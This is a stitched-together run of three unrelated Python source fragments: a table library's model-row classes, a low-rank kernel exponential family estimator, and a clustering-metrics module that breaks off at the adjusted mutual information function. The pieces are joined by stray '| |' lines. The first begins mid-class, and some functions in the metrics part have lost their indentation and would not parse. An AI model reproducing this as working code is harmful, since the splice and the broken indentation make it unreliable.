    __metaclass__ = ModelTableMetaclass
class ModelRows(Rows):
    """Row collection for model tables.

    Counting is delegated to the queryset so the data never has to be
    materialized just to determine its length.
    """
    def __init__(self, *args, **kwargs):
        super(ModelRows, self).__init__(*args, **kwargs)
        self.row_klass = BoundModelRow

    def _reset(self):
        # invalidate the cached row count
        self._length = None

    def __len__(self):
        """Use the queryset count() method to get the length, instead of
        loading all results into memory. This allows, for example,
        smart paginators that use len() to perform better.
        """
        cached = getattr(self, '_length', None)
        if cached is None:
            cached = self.table.data.count()
            self._length = cached
        return cached

    # for compatibility with QuerySetPaginator
    count = __len__
class BoundModelRow(BoundRow):
    """Special version of the BoundRow class that can handle model instances
    as data.
    We could simply have ModelTable spawn the normal BoundRow objects
    with the instance converted to a dict instead. However, this way allows
    us to support non-field attributes and methods on the model as well.
    """
    def __getitem__(self, name):
        """Overridden. Return this row's data for a certain column, with
        custom handling for model tables.
        """
        # find the column for the requested field, for reference
        boundcol = self.table._columns[name]
        # If the column has a name override (we know then that is was also
        # used for access, e.g. if the condition is true, then
        # ``boundcol.column.name == name``), we need to make sure we use the
        # declaration name to access the model field.
        if boundcol.column.data:
            if callable(boundcol.column.data):
                # NOTE(review): any falsy result (0, '', empty list), not
                # just None, falls back to the column default here — confirm
                # that this is the intended contract for callable "data".
                result = boundcol.column.data(self)
                if not result:
                    if boundcol.column.default is not None:
                        return boundcol.get_default(self)
                return result
            else:
                # "data" is a string naming the model attribute to resolve
                name = boundcol.column.data
        else:
            name = boundcol.declared_name
        # try to resolve relationships spanning attributes
        bits = name.split('__')
        current = self.data
        for bit in bits:
            # note the difference between the attribute being None and not
            # existing at all; assume "value doesn't exist" in the former
            # (e.g. a relationship has no value), raise error in the latter.
            # a more proper solution perhaps would look at the model meta
            # data instead to find out whether a relationship is valid; see
            # also ``_validate_column_name``, where such a mechanism is
            # already implemented).
            if not hasattr(current, bit):
                raise ValueError("Could not resolve %s from %s" % (bit, name))
            current = getattr(current, bit)
            # model methods (and other callables) are invoked so columns
            # can point at them directly
            if callable(current):
                current = current()
            # important that we break in None case, or a relationship
            # spanning across a null-key will raise an exception in the
            # next iteration, instead of defaulting.
            if current is None:
                break
        if current is None:
            # ...the whole name (i.e. the last bit) resulted in None
            if boundcol.column.default is not None:
                return boundcol.get_default(self)
        return current
| |
from abc import abstractmethod
from scipy.sparse.linalg.interface import LinearOperator
from scipy.sparse.linalg.isolve.iterative import bicgstab
from kernel_exp_family.estimators.lite.gaussian import KernelExpLiteGaussian
try:
    from kernel_exp_family.estimators.parameter_search_bo import BayesOptSearch
except ImportError:
    # Use the function-call form of print: with a single string argument it
    # behaves identically on Python 2 (parenthesized expression) and Python 3,
    # whereas the bare statement form is a SyntaxError on Python 3.
    print("Bayesian Optimization for hyper-parameters unavailable -- pybo required")
from kernel_exp_family.kernels.incomplete_cholesky import incomplete_cholesky_gaussian, \
incomplete_cholesky_new_points_gaussian
from kernel_exp_family.tools.assertions import assert_array_shape
from kernel_exp_family.tools.log import Log
import numpy as np
logger = Log.get_logger()
def compute_b(X, Y, L_X, L_Y, sigma):
    """Compute the right-hand-side vector b of the linear system.

    The kernel matrices never appear explicitly: ``L_X`` and ``L_Y`` are
    the incomplete Cholesky factors of the X- and Y-kernel matrices, and
    every term is expressed through products with these factors.
    """
    assert X.shape[1] == Y.shape[1]
    assert L_X.shape[0] == X.shape[0]
    assert L_Y.shape[0] == Y.shape[0]

    num_x, num_dims = X.shape
    b = np.zeros(num_x)
    # K_XY.dot(ones), computed through the low-rank factors
    LX1 = L_X.dot(np.sum(L_Y.T, 1))
    for d in range(num_dims):
        x_d = X[:, d]
        y_d = Y[:, d]
        x_d_sq = x_d ** 2
        y_d_sq = y_d ** 2
        # diag(v).dot(M) written as a broadcast product rather than np.diag
        # See http://mail.scipy.org/pipermail/numpy-discussion/2007-March/026809.html
        D_sq_LX = x_d_sq[:, np.newaxis] * L_X
        D_x_LX = x_d[:, np.newaxis] * L_X
        # accumulate b incrementally, exploiting the Cholesky factorisation of K
        b += 2. / sigma * (L_X.dot(L_Y.T.dot(y_d_sq))
                           + D_sq_LX.dot(np.sum(L_Y.T, 1))
                           - 2 * D_x_LX.dot(L_Y.T.dot(y_d))) - LX1
    return b
def apply_left_C(v, X, Y, L_X, L_Y, lmbda):
    """Matrix-free product ``C.dot(v)`` using incomplete Cholesky factors.

    C is a sum over the data dimensions; each summand is applied to ``v``
    as a chain of low-rank factor products, so no N x N matrix is ever
    formed. With ``lmbda > 0`` the result is regularised with both
    ``lmbda * K`` (via the factors) and ``lmbda * I``.
    """
    assert len(v.shape) == 1
    assert len(X) == len(L_X)
    assert len(Y) == len(L_Y)
    assert L_X.shape[1] == L_Y.shape[1]
    assert X.shape[1] == Y.shape[1]

    num_x, num_dims = X.shape
    result = np.zeros(num_x)
    for d in range(num_dims):
        x_d = X[:, d]
        y_d = Y[:, d]
        # Broadcast products replace np.diag(...).dot(...):
        # conceptually this computes
        #   (D_x K - K D_y).dot(K.T D_x - D_y K.T).dot(v)
        # entirely through the factors L_X, L_Y.
        D_x_LX = x_d[:, np.newaxis] * L_X
        LY_T_D_y = L_Y.T * y_d
        LX_T_D_x = L_X.T * x_d
        D_y_LY = y_d[:, np.newaxis] * L_Y
        # right factor applied to v
        right_a = L_X.T.dot(v)
        right_a = D_y_LY.dot(right_a)
        right_b = LX_T_D_x.dot(v)
        right_b = L_Y.dot(right_b)
        temp = right_a - right_b
        # left factor applied to the intermediate result
        left_a = LY_T_D_y.dot(temp)
        left_a = L_X.dot(left_a)
        left_b = L_Y.T.dot(temp)
        left_b = D_x_LX.dot(left_b)
        # accumulate this dimension's contribution
        result += left_a - left_b
    if lmbda > 0:
        # regularise with K = L_X.dot(L_X.T)
        result += lmbda * L_X.dot(L_X.T.dot(v))
        # regularise with I
        result += lmbda * v
    return result
def fit(X, Y, sigma, lmbda, L_X, L_Y,
        cg_tol=1e-3,
        cg_maxiter=None,
        alpha0=None):
    """Solve the regularised low-rank system for the alpha coefficients.

    Builds the right-hand side ``b`` and applies the system matrix ``C``
    only as a ``LinearOperator`` (matrix-free), then solves with bicgstab.
    ``alpha0``, when given, warm-starts the solver from a previous solution.
    Returns the scaled solution ``-sigma / 2 * alpha``.
    """
    if cg_maxiter is None:
        # CG needs at max dimension many iterations
        cg_maxiter = L_X.shape[0]

    NX = X.shape[0]

    # set up and solve regularised linear system via bicgstab
    # this never stores an NxN matrix
    b = compute_b(X, Y, L_X, L_Y, sigma)
    matvec = lambda v: apply_left_C(v, X, Y, L_X, L_Y, lmbda)
    C_operator = LinearOperator((NX, NX), matvec=matvec, dtype=np.float64)

    # Count CG iterations via a closure over a mutable cell instead of the
    # previous module-level ``global counter`` hack, which leaked state into
    # the module namespace and was not safe across concurrent calls.
    num_iterations = [0]

    def callback(x):
        num_iterations[0] += 1

    # start optimisation from alpha0, if present
    if alpha0 is not None:
        logger.debug("Starting bicgstab from previous alpha0")
    solution, info = bicgstab(C_operator, b, tol=cg_tol, maxiter=cg_maxiter,
                              callback=callback, x0=alpha0)
    logger.debug("Ran bicgstab for %d iterations." % num_iterations[0])
    if info > 0:
        logger.warning("Warning: CG not convergence in %.3f tolerance within %d iterations" % \
                       (cg_tol, cg_maxiter))

    a = -sigma / 2. * solution
    return a
def objective(X, Y, sigma, lmbda, alpha, L_X, L_Y, b=None):
    """Evaluate the score-matching objective for the given coefficients.

    ``b`` may be passed in to avoid recomputation; when ``None`` it is
    rebuilt from the low-rank factors.
    """
    if b is None:
        b = compute_b(X, Y, L_X, L_Y, sigma)
    n_data = len(X)
    # linear term in alpha
    linear_term = 2. / (n_data * sigma) * alpha.dot(b)
    # quadratic term, with C applied matrix-free
    quadratic_term = 2. / (n_data * sigma ** 2) * \
        alpha.dot(apply_left_C(alpha, X, Y, L_X, L_Y, lmbda))
    return linear_term + quadratic_term
class KernelExpLiteGaussianLowRank(KernelExpLiteGaussian):
    """Low-rank variant of KernelExpLiteGaussian.

    Replaces the dense kernel computations with an incomplete Cholesky
    factorisation (relative precision ``eta``) and a matrix-free
    conjugate-gradient solve, so no N x N matrix is ever stored.
    """
    def __init__(self, sigma, lmbda, D, N, eta=0.1, cg_tol=1e-3, cg_maxiter=None):
        KernelExpLiteGaussian.__init__(self, sigma, lmbda, D, N)

        self.eta = eta          # relative precision of incomplete Cholesky
        self.cg_tol = cg_tol    # bicgstab convergence tolerance
        self.cg_maxiter = cg_maxiter  # None -> defaults to factor rank in fit()

    # NOTE: the previous ``@abstractmethod`` decorator was removed. This is
    # a concrete implementation, and since no class in the hierarchy uses
    # ABCMeta the decorator had no enforcement effect — it only misled
    # readers into thinking the method was abstract.
    def fit_wrapper_(self):
        self.inc_cholesky = incomplete_cholesky_gaussian(self.X, self.sigma, eta=self.eta)
        L_X = self.inc_cholesky["R"].T
        logger.debug("Incomplete Cholesky using rank %d/%d capturing %.3f/1.0 of the variance " % \
                     (len(self.inc_cholesky['I']), len(self.X), self.eta))

        # start optimisation from previous alpha, if its size still matches
        alpha0 = self.alpha if len(self.alpha) == len(self.X) and len(self.alpha) > 0 else np.zeros(len(self.X))
        return fit(self.X, self.X, self.sigma, self.lmbda, L_X, L_X, self.cg_tol, self.cg_maxiter, alpha0)

    def objective(self, X):
        assert_array_shape(X, ndim=2, dims={1: self.D})
        L_X = self.inc_cholesky["R"].T
        # extend the existing factorisation to the new points X
        L_Y = incomplete_cholesky_new_points_gaussian(self.X, X, self.sigma, self.inc_cholesky['I'], self.inc_cholesky['R'], self.inc_cholesky['nu']).T
        b = compute_b(self.X, X, L_X, L_Y, self.sigma)
        return objective(self.X, X, self.sigma, self.lmbda, self.alpha, L_X, L_Y, b)
class KernelExpLiteGaussianLowRankAdaptive(KernelExpLiteGaussianLowRank):
    """Low-rank estimator that tunes its hyper-parameters via Bayesian
    optimisation (pybo) once enough data is available."""
    def __init__(self, sigma, lmbda, D, N, eta=0.1, cg_tol=1e-3, cg_maxiter=None,
                 num_initial_evaluations=3, num_evaluations=3, minimum_size_learning=100,
                 num_initial_evaluations_relearn=1, num_evaluations_relearn=1,
                 param_bounds=None):
        KernelExpLiteGaussianLowRank.__init__(self, sigma, lmbda, D, N, eta, cg_tol, cg_maxiter)

        # Fixed mutable-default-argument bug: the old signature used
        # ``param_bounds={'sigma': [-3,3]}``, a single dict shared across all
        # instances; mutating it on one instance would silently affect every
        # other. Build a fresh default per instance instead.
        if param_bounds is None:
            param_bounds = {'sigma': [-3, 3]}

        self.bo = None                 # BayesOptSearch instance, lazily created
        self.param_bounds = param_bounds
        self.num_initial_evaluations = num_initial_evaluations
        self.num_iter = num_evaluations
        self.minimum_size_learning = minimum_size_learning

        self.n_initial_relearn = num_initial_evaluations_relearn
        self.n_iter_relearn = num_evaluations_relearn

        # guards against re-entering parameter learning from the
        # cross-validation fit calls issued by the optimiser itself
        self.learning_parameters = False

    def fit(self, X):
        # avoid infinite recursion from x-validation fit call
        if not self.learning_parameters and len(X) >= self.minimum_size_learning:
            self.learning_parameters = True
            if self.bo is None:
                logger.info("Bayesian optimisation from scratch.")
                self.bo = BayesOptSearch(self, X, self.param_bounds, n_initial=self.num_initial_evaluations)
                best_params = self.bo.optimize(self.num_iter)
            else:
                logger.info("Bayesian optimisation using prior model.")
                self.bo.re_initialise(X, self.n_initial_relearn)
                best_params = self.bo.optimize(self.n_iter_relearn)

            self.set_parameters_from_dict(best_params)
            self.learning_parameters = False
            logger.info("Learnt %s" % str(self.get_parameters()))

        # standard fit call from superclass
        KernelExpLiteGaussianLowRank.fit(self, X)
| |
"""Utilities to evaluate the clustering performance of models.
Functions named as *_score return a scalar value to maximize: the higher the
better.
"""
# Authors: Olivier Grisel <olivier.grisel@ensta.org>
# Wei LI <kuantkid@gmail.com>
# Diego Molla <dmolla-aliod@gmail.com>
# Arnaud Fouchet <foucheta@gmail.com>
# Thierry Guillemot <thierry.guillemot.work@gmail.com>
# Gregory Stupp <stuppie@gmail.com>
# Joel Nothman <joel.nothman@gmail.com>
# Arya McCarthy <arya@jhu.edu>
# License: BSD 3 clause
from math import log
import numpy as np
from scipy import sparse as sp
from .expected_mutual_info_fast import expected_mutual_information
from ...utils.validation import check_array
from ...utils.fixes import comb, _astype_copy_false
def _comb2(n):
# the exact version is faster for k == 2: use it by default globally in
# this module instead of the float approximate variant
return comb(n, 2, exact=1)
def check_clusterings(labels_true, labels_pred):
    """Check that the labels arrays are 1D and of same dimension.

    Parameters
    ----------
    labels_true : int array, shape = [n_samples]
        The true labels

    labels_pred : int array, shape = [n_samples]
        The predicted labels

    Returns
    -------
    labels_true, labels_pred : the inputs converted to ndarrays
    """
    labels_true = np.asarray(labels_true)
    labels_pred = np.asarray(labels_pred)

    # both arrays must be one-dimensional
    for arr_name, arr in (("labels_true", labels_true),
                          ("labels_pred", labels_pred)):
        if arr.ndim != 1:
            raise ValueError(
                "%s must be 1D: shape is %r" % (arr_name, arr.shape))

    # and of matching length
    if labels_true.shape != labels_pred.shape:
        raise ValueError(
            "labels_true and labels_pred must have same size, got %d and %d"
            % (labels_true.shape[0], labels_pred.shape[0]))
    return labels_true, labels_pred
def _generalized_average(U, V, average_method):
"""Return a particular mean of two numbers."""
if average_method == "min":
return min(U, V)
elif average_method == "geometric":
return np.sqrt(U * V)
elif average_method == "arithmetic":
return np.mean([U, V])
elif average_method == "max":
return max(U, V)
else:
raise ValueError("'average_method' must be 'min', 'geometric', "
"'arithmetic', or 'max'")
def contingency_matrix(labels_true, labels_pred, eps=None, sparse=False):
    """Build a contingency matrix describing the relationship between labels.

    Parameters
    ----------
    labels_true : int array, shape = [n_samples]
        Ground truth class labels to be used as a reference

    labels_pred : array, shape = [n_samples]
        Cluster labels to evaluate

    eps : None or float, optional.
        If a float, that value is added to all values in the contingency
        matrix. This helps to stop NaN propagation.
        If ``None``, nothing is adjusted.

    sparse : boolean, optional.
        If True, return a sparse CSR contingency matrix. If ``eps is not
        None``, and ``sparse is True``, will throw ValueError.

        .. versionadded:: 0.18

    Returns
    -------
    contingency : {array-like, sparse}, shape=[n_classes_true, n_classes_pred]
        Matrix :math:`C` such that :math:`C_{i, j}` is the number of samples in
        true class :math:`i` and in predicted class :math:`j`. If
        ``eps is None``, the dtype of this array will be integer. If ``eps`` is
        given, the dtype will be float.
        Will be a ``scipy.sparse.csr_matrix`` if ``sparse=True``.
    """
    if eps is not None and sparse:
        raise ValueError("Cannot set 'eps' when sparse=True")

    classes, class_idx = np.unique(labels_true, return_inverse=True)
    clusters, cluster_idx = np.unique(labels_pred, return_inverse=True)
    n_classes = classes.shape[0]
    n_clusters = clusters.shape[0]
    # Using coo_matrix to accelerate simple histogram calculation,
    # i.e. bins are consecutive integers
    # Currently, coo_matrix is faster than histogram2d for simple cases
    # NOTE: was ``dtype=np.int`` — a deprecated alias of the builtin ``int``
    # that NumPy removed in 1.24, making this line raise AttributeError.
    # Use the explicit fixed-width integer type instead.
    contingency = sp.coo_matrix((np.ones(class_idx.shape[0]),
                                 (class_idx, cluster_idx)),
                                shape=(n_classes, n_clusters),
                                dtype=np.int64)
    if sparse:
        contingency = contingency.tocsr()
        contingency.sum_duplicates()
    else:
        contingency = contingency.toarray()
        if eps is not None:
            # don't use += as contingency is integer
            contingency = contingency + eps
    return contingency
# clustering measures
def adjusted_rand_score(labels_true, labels_pred):
    """Rand index adjusted for chance.

    The Rand Index computes a similarity measure between two clusterings
    by considering all pairs of samples and counting pairs that are
    assigned in the same or different clusters in the predicted and
    true clusterings.

    The raw RI score is then "adjusted for chance" into the ARI score
    using the following scheme::

        ARI = (RI - Expected_RI) / (max(RI) - Expected_RI)

    The adjusted Rand index is thus ensured to have a value close to
    0.0 for random labeling independently of the number of clusters and
    samples and exactly 1.0 when the clusterings are identical (up to
    a permutation). ARI is a symmetric measure::

        adjusted_rand_score(a, b) == adjusted_rand_score(b, a)

    Read more in the :ref:`User Guide <adjusted_rand_score>`.

    Parameters
    ----------
    labels_true : int array, shape = [n_samples]
        Ground truth class labels to be used as a reference

    labels_pred : array, shape = [n_samples]
        Cluster labels to evaluate

    Returns
    -------
    ari : float
       Similarity score between -1.0 and 1.0. Random labelings have an ARI
       close to 0.0. 1.0 stands for perfect match.

    Examples
    --------
    Perfectly matching labelings have a score of 1 even

      >>> from sklearn.metrics.cluster import adjusted_rand_score
      >>> adjusted_rand_score([0, 0, 1, 1], [0, 0, 1, 1])
      1.0
      >>> adjusted_rand_score([0, 0, 1, 1], [1, 1, 0, 0])
      1.0

    Labelings that assign all classes members to the same clusters
    are complete but not always pure, hence penalized::

      >>> adjusted_rand_score([0, 0, 1, 2], [0, 0, 1, 1])
      0.57...

    ARI is symmetric, so labelings that have pure clusters with members
    coming from the same classes but unnecessary splits are penalized::

      >>> adjusted_rand_score([0, 0, 1, 1], [0, 0, 1, 2])
      0.57...

    If classes members are completely split across different clusters, the
    assignment is totally incomplete, hence the ARI is very low::

      >>> adjusted_rand_score([0, 0, 0, 0], [0, 1, 2, 3])
      0.0

    References
    ----------
    .. [Hubert1985] L. Hubert and P. Arabie, Comparing Partitions,
      Journal of Classification 1985
      https://link.springer.com/article/10.1007%2FBF01908075

    .. [wk] https://en.wikipedia.org/wiki/Rand_index#Adjusted_Rand_index

    See also
    --------
    adjusted_mutual_info_score: Adjusted Mutual Information
    """
    labels_true, labels_pred = check_clusterings(labels_true, labels_pred)
    n_samples = labels_true.shape[0]
    n_classes = np.unique(labels_true).shape[0]
    n_clusters = np.unique(labels_pred).shape[0]

    # Special limit cases: no clustering since the data is not split, or
    # trivial clustering where each document gets its own cluster.
    # These are perfect matches, hence return 1.0.
    if n_classes == n_clusters:
        if n_classes in (0, 1) or n_classes == n_samples:
            return 1.0

    # Compute the ARI using the contingency data
    contingency = contingency_matrix(labels_true, labels_pred, sparse=True)
    comb_rows = sum(_comb2(n_c) for n_c in np.ravel(contingency.sum(axis=1)))
    comb_cols = sum(_comb2(n_k) for n_k in np.ravel(contingency.sum(axis=0)))
    comb_cells = sum(_comb2(n_ij) for n_ij in contingency.data)

    expected_index = (comb_rows * comb_cols) / _comb2(n_samples)
    max_index = (comb_cols + comb_rows) / 2.
    return (comb_cells - expected_index) / (max_index - expected_index)
def homogeneity_completeness_v_measure(labels_true, labels_pred, beta=1.0):
    """Compute the homogeneity and completeness and V-Measure scores at once.

    Those metrics are based on normalized conditional entropy measures of
    the clustering labeling to evaluate given the knowledge of a Ground
    Truth class labels of the same samples.

    A clustering result satisfies homogeneity if all of its clusters
    contain only data points which are members of a single class.

    A clustering result satisfies completeness if all the data points
    that are members of a given class are elements of the same cluster.

    Both scores have positive values between 0.0 and 1.0, larger values
    being desirable.

    Those 3 metrics are independent of the absolute values of the labels:
    a permutation of the class or cluster label values won't change the
    score values in any way.

    V-Measure is furthermore symmetric: swapping ``labels_true`` and
    ``label_pred`` will give the same score. This does not hold for
    homogeneity and completeness. V-Measure is identical to
    :func:`normalized_mutual_info_score` with the arithmetic averaging
    method.

    Read more in the :ref:`User Guide <homogeneity_completeness>`.

    Parameters
    ----------
    labels_true : int array, shape = [n_samples]
        ground truth class labels to be used as a reference

    labels_pred : array, shape = [n_samples]
        cluster labels to evaluate

    beta : float
        Ratio of weight attributed to ``homogeneity`` vs ``completeness``.
        If ``beta`` is greater than 1, ``completeness`` is weighted more
        strongly in the calculation. If ``beta`` is less than 1,
        ``homogeneity`` is weighted more strongly.

    Returns
    -------
    homogeneity : float
       score between 0.0 and 1.0. 1.0 stands for perfectly homogeneous labeling

    completeness : float
       score between 0.0 and 1.0. 1.0 stands for perfectly complete labeling

    v_measure : float
        harmonic mean of the first two

    See also
    --------
    homogeneity_score
    completeness_score
    v_measure_score
    """
    labels_true, labels_pred = check_clusterings(labels_true, labels_pred)

    # an empty clustering is trivially perfect on all three measures
    if len(labels_true) == 0:
        return 1.0, 1.0, 1.0

    entropy_C = entropy(labels_true)
    entropy_K = entropy(labels_pred)

    contingency = contingency_matrix(labels_true, labels_pred, sparse=True)
    MI = mutual_info_score(None, None, contingency=contingency)

    # zero entropy means a single class/cluster: the score is perfect by
    # convention rather than 0/0
    homogeneity = MI / (entropy_C) if entropy_C else 1.0
    completeness = MI / (entropy_K) if entropy_K else 1.0

    # Renamed local (was ``v_measure_score``): the old name shadowed the
    # module-level function of the same name defined below.
    if homogeneity + completeness == 0.0:
        v_measure = 0.0
    else:
        # weighted harmonic mean of homogeneity and completeness
        v_measure = ((1 + beta) * homogeneity * completeness
                     / (beta * homogeneity + completeness))

    return homogeneity, completeness, v_measure
def homogeneity_score(labels_true, labels_pred):
    """Homogeneity metric of a cluster labeling given a ground truth.

    A clustering result satisfies homogeneity if all of its clusters
    contain only data points which are members of a single class.

    This metric is independent of the absolute values of the labels:
    a permutation of the class or cluster label values won't change the
    score value in any way.

    This metric is not symmetric: switching ``label_true`` with ``label_pred``
    will return the :func:`completeness_score` which will be different in
    general.

    Read more in the :ref:`User Guide <homogeneity_completeness>`.

    Parameters
    ----------
    labels_true : int array, shape = [n_samples]
        ground truth class labels to be used as a reference

    labels_pred : array, shape = [n_samples]
        cluster labels to evaluate

    Returns
    -------
    homogeneity : float
       score between 0.0 and 1.0. 1.0 stands for perfectly homogeneous labeling

    References
    ----------
    .. [1] `Andrew Rosenberg and Julia Hirschberg, 2007. V-Measure: A
       conditional entropy-based external cluster evaluation measure
       <https://aclweb.org/anthology/D/D07/D07-1043.pdf>`_

    See also
    --------
    completeness_score
    v_measure_score

    Examples
    --------
    Perfect labelings are homogeneous::

      >>> from sklearn.metrics.cluster import homogeneity_score
      >>> homogeneity_score([0, 0, 1, 1], [1, 1, 0, 0])
      1.0

    Non-perfect labelings that further split classes into more clusters can be
    perfectly homogeneous::

      >>> print("%.6f" % homogeneity_score([0, 0, 1, 1], [0, 0, 1, 2]))
      1.000000
      >>> print("%.6f" % homogeneity_score([0, 0, 1, 1], [0, 1, 2, 3]))
      1.000000

    Clusters that include samples from different classes do not make for an
    homogeneous labeling::

      >>> print("%.6f" % homogeneity_score([0, 0, 1, 1], [0, 1, 0, 1]))
      0.0...
      >>> print("%.6f" % homogeneity_score([0, 0, 1, 1], [0, 0, 0, 0]))
      0.0...
    """
    # homogeneity is the first element of the (h, c, v) triple
    homogeneity, _, _ = homogeneity_completeness_v_measure(labels_true,
                                                           labels_pred)
    return homogeneity
def completeness_score(labels_true, labels_pred):
    """Completeness metric of a cluster labeling given a ground truth.

    A clustering result satisfies completeness if all the data points
    that are members of a given class are elements of the same cluster.

    This metric is independent of the absolute values of the labels:
    a permutation of the class or cluster label values won't change the
    score value in any way.

    This metric is not symmetric: switching ``label_true`` with ``label_pred``
    will return the :func:`homogeneity_score` which will be different in
    general.

    Read more in the :ref:`User Guide <homogeneity_completeness>`.

    Parameters
    ----------
    labels_true : int array, shape = [n_samples]
        ground truth class labels to be used as a reference

    labels_pred : array, shape = [n_samples]
        cluster labels to evaluate

    Returns
    -------
    completeness : float
       score between 0.0 and 1.0. 1.0 stands for perfectly complete labeling

    References
    ----------
    .. [1] `Andrew Rosenberg and Julia Hirschberg, 2007. V-Measure: A
       conditional entropy-based external cluster evaluation measure
       <https://aclweb.org/anthology/D/D07/D07-1043.pdf>`_

    See also
    --------
    homogeneity_score
    v_measure_score

    Examples
    --------
    Perfect labelings are complete::

      >>> from sklearn.metrics.cluster import completeness_score
      >>> completeness_score([0, 0, 1, 1], [1, 1, 0, 0])
      1.0

    Non-perfect labelings that assign all classes members to the same clusters
    are still complete::

      >>> print(completeness_score([0, 0, 1, 1], [0, 0, 0, 0]))
      1.0
      >>> print(completeness_score([0, 1, 2, 3], [0, 0, 1, 1]))
      0.999...

    If classes members are split across different clusters, the
    assignment cannot be complete::

      >>> print(completeness_score([0, 0, 1, 1], [0, 1, 0, 1]))
      0.0
      >>> print(completeness_score([0, 0, 0, 0], [0, 1, 2, 3]))
      0.0
    """
    # completeness is the second element of the (h, c, v) triple
    _, completeness, _ = homogeneity_completeness_v_measure(labels_true,
                                                            labels_pred)
    return completeness
def v_measure_score(labels_true, labels_pred, beta=1.0):
    """V-measure cluster labeling given a ground truth.

    This score is identical to :func:`normalized_mutual_info_score` with
    the ``'arithmetic'`` option for averaging.

    The V-measure is the harmonic mean between homogeneity and completeness::

        v = (1 + beta) * homogeneity * completeness
             / (beta * homogeneity + completeness)

    This metric is independent of the absolute values of the labels:
    a permutation of the class or cluster label values won't change the
    score value in any way.

    This metric is furthermore symmetric: switching ``label_true`` with
    ``label_pred`` will return the same score value. This can be useful to
    measure the agreement of two independent label assignments strategies
    on the same dataset when the real ground truth is not known.

    Read more in the :ref:`User Guide <homogeneity_completeness>`.

    Parameters
    ----------
    labels_true : int array, shape = [n_samples]
        ground truth class labels to be used as a reference

    labels_pred : array, shape = [n_samples]
        cluster labels to evaluate

    beta : float
        Ratio of weight attributed to ``homogeneity`` vs ``completeness``.
        If ``beta`` is greater than 1, ``completeness`` is weighted more
        strongly in the calculation. If ``beta`` is less than 1,
        ``homogeneity`` is weighted more strongly.

    Returns
    -------
    v_measure : float
       score between 0.0 and 1.0. 1.0 stands for perfectly complete labeling

    References
    ----------
    .. [1] `Andrew Rosenberg and Julia Hirschberg, 2007. V-Measure: A
       conditional entropy-based external cluster evaluation measure
       <https://aclweb.org/anthology/D/D07/D07-1043.pdf>`_

    See also
    --------
    homogeneity_score
    completeness_score
    normalized_mutual_info_score

    Examples
    --------
    Perfect labelings are both homogeneous and complete, hence have score 1.0::

      >>> from sklearn.metrics.cluster import v_measure_score
      >>> v_measure_score([0, 0, 1, 1], [0, 0, 1, 1])
      1.0
      >>> v_measure_score([0, 0, 1, 1], [1, 1, 0, 0])
      1.0

    Labelings that assign all classes members to the same clusters
    are complete but not homogeneous, hence penalized::

      >>> print("%.6f" % v_measure_score([0, 0, 1, 2], [0, 0, 1, 1]))
      0.8...
      >>> print("%.6f" % v_measure_score([0, 1, 2, 3], [0, 0, 1, 1]))
      0.66...

    Labelings that have pure clusters with members coming from the same
    classes are homogeneous but un-necessary splits harm completeness
    and thus penalize V-measure as well::

      >>> print("%.6f" % v_measure_score([0, 0, 1, 1], [0, 0, 1, 2]))
      0.8...
      >>> print("%.6f" % v_measure_score([0, 0, 1, 1], [0, 1, 2, 3]))
      0.66...

    If classes members are completely split across different clusters,
    the assignment is totally incomplete, hence the V-Measure is null::

      >>> print("%.6f" % v_measure_score([0, 0, 0, 0], [0, 1, 2, 3]))
      0.0...

    Clusters that include samples from totally different classes totally
    destroy the homogeneity of the labeling, hence::

      >>> print("%.6f" % v_measure_score([0, 0, 1, 1], [0, 0, 0, 0]))
      0.0...
    """
    # the V-measure is the third element of the (h, c, v) triple
    _, _, v_measure = homogeneity_completeness_v_measure(labels_true,
                                                         labels_pred,
                                                         beta=beta)
    return v_measure
def mutual_info_score(labels_true, labels_pred, contingency=None):
    """Mutual Information between two clusterings.
    The Mutual Information is a measure of the similarity between two labels of
    the same data. Where :math:`|U_i|` is the number of the samples
    in cluster :math:`U_i` and :math:`|V_j|` is the number of the
    samples in cluster :math:`V_j`, the Mutual Information
    between clusterings :math:`U` and :math:`V` is given as:
    .. math::
        MI(U,V)=\\sum_{i=1}^{|U|} \\sum_{j=1}^{|V|} \\frac{|U_i\\cap V_j|}{N}
        \\log\\frac{N|U_i \\cap V_j|}{|U_i||V_j|}
    This metric is independent of the absolute values of the labels:
    a permutation of the class or cluster label values won't change the
    score value in any way.
    This metric is furthermore symmetric: switching ``label_true`` with
    ``label_pred`` will return the same score value. This can be useful to
    measure the agreement of two independent label assignments strategies
    on the same dataset when the real ground truth is not known.
    Read more in the :ref:`User Guide <mutual_info_score>`.
    Parameters
    ----------
    labels_true : int array, shape = [n_samples]
        A clustering of the data into disjoint subsets.
    labels_pred : array, shape = [n_samples]
        A clustering of the data into disjoint subsets.
    contingency : {None, array, sparse matrix}, \
                  shape = [n_classes_true, n_classes_pred]
        A contingency matrix given by the :func:`contingency_matrix` function.
        If value is ``None``, it will be computed, otherwise the given value is
        used, with ``labels_true`` and ``labels_pred`` ignored.
    Returns
    -------
    mi : float
       Mutual information, a non-negative value
    See also
    --------
    adjusted_mutual_info_score: Adjusted against chance Mutual Information
    normalized_mutual_info_score: Normalized Mutual Information
    """
    if contingency is None:
        labels_true, labels_pred = check_clusterings(labels_true, labels_pred)
        contingency = contingency_matrix(labels_true, labels_pred, sparse=True)
    else:
        # validate a user-supplied contingency matrix; only integer counts
        # are accepted
        contingency = check_array(contingency,
                                  accept_sparse=['csr', 'csc', 'coo'],
                                  dtype=[int, np.int32, np.int64])
    # Extract the non-zero cells; only those contribute to the MI sum.
    if isinstance(contingency, np.ndarray):
        # For an array
        nzx, nzy = np.nonzero(contingency)
        nz_val = contingency[nzx, nzy]
    elif sp.issparse(contingency):
        # For a sparse matrix
        nzx, nzy, nz_val = sp.find(contingency)
    else:
        raise ValueError("Unsupported type for 'contingency': %s" %
                         type(contingency))
    # marginal counts per true class (pi) and per predicted cluster (pj)
    contingency_sum = contingency.sum()
    pi = np.ravel(contingency.sum(axis=1))
    pj = np.ravel(contingency.sum(axis=0))
    log_contingency_nm = np.log(nz_val)
    contingency_nm = nz_val / contingency_sum
    # Don't need to calculate the full outer product, just for non-zeroes
    # (the int64 cast keeps the products of marginals from overflowing on
    # platforms where the default integer is 32-bit)
    outer = (pi.take(nzx).astype(np.int64, copy=False)
             * pj.take(nzy).astype(np.int64, copy=False))
    log_outer = -np.log(outer) + log(pi.sum()) + log(pj.sum())
    # per-cell MI contributions; summed at the end in one pass
    mi = (contingency_nm * (log_contingency_nm - log(contingency_sum)) +
          contingency_nm * log_outer)
    return mi.sum()
def adjusted_mutual_info_score(labels_true, labels_pred,
                               average_method='arithmetic'):
    """Adjusted Mutual Information between two clusterings.

